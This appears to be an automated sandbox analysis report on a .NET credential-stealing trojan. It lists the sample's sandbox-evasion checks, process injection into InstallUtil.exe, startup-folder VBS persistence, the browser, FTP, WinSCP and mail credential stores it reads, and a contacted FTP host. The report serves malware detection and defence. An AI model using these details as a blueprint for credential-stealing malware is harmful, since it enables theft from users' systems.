                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\O65887cvz7.exeMemory allocated: 1100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeMemory allocated: 1100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: wscript.exe, 00000003.00000002.2158940147.000001E718AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                    Source: InstallUtil.exe, 00000002.00000002.2187384217.00000000063EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringPNPDeviceID
                    Source: InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000003.00000002.2158940147.000001E718AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000005.00000002.3293456606.0000000005880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeQueries volume information: C:\Users\user\Desktop\O65887cvz7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeQueries volume information: C:\Users\user\AppData\Roaming\InnerException.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3286051641.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4308, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3286051641.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4308, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3286051641.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4324, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4308, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts121
                    Windows Management Instrumentation
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Encrypted Channel
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    21
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder
                    2
                    Registry Run Keys / Startup Folder
                    12
                    Software Packing
                    NTDS12
                    Virtualization/Sandbox Evasion
                    Distributed Component Object Model1
                    Input Capture
                    11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549420 Sample: O65887cvz7.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 29 ftp.alternatifplastik.com 2->29 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 11 other signatures 2->39 8 O65887cvz7.exe 5 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 23 C:\Users\user\AppData\...\InnerException.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\...\InnerException.vbs, ASCII 8->25 dropped 27 C:\...\InnerException.exe:Zone.Identifier, ASCII 8->27 dropped 49 Drops VBS files to the startup folder 8->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->51 14 InstallUtil.exe 15 2 8->14         started        53 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->53 18 InnerException.exe 2 12->18         started        signatures6 process7 dnsIp8 31 ftp.alternatifplastik.com 5.2.84.236, 21, 49704, 49705 ALASTYRTR Turkey 14->31 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->57 59 Tries to steal Mail credentials (via file / registry access) 14->59 61 Antivirus detection for dropped file 18->61 63 Multi AV Scanner detection for dropped file 18->63 65 Machine Learning detection for dropped file 18->65 20 InstallUtil.exe 2 18->20         started        signatures9 process10 signatures11 41 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->41 43 Tries to steal Mail credentials (via file / registry access) 20->43 45 Tries to harvest and steal ftp login credentials 20->45 47 Tries to harvest and steal browser information (history, passwords, etc) 20->47

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    O65887cvz7.exe75%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    O65887cvz7.exe100%AviraTR/AD.GenSteal.dkodx
                    O65887cvz7.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\InnerException.exe100%AviraTR/AD.GenSteal.dkodx
                    C:\Users\user\AppData\Roaming\InnerException.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\InnerException.exe75%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ftp.alternatifplastik.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.alternatifplastik.com
                    5.2.84.236
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netO65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/mgravell/protobuf-netiO65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
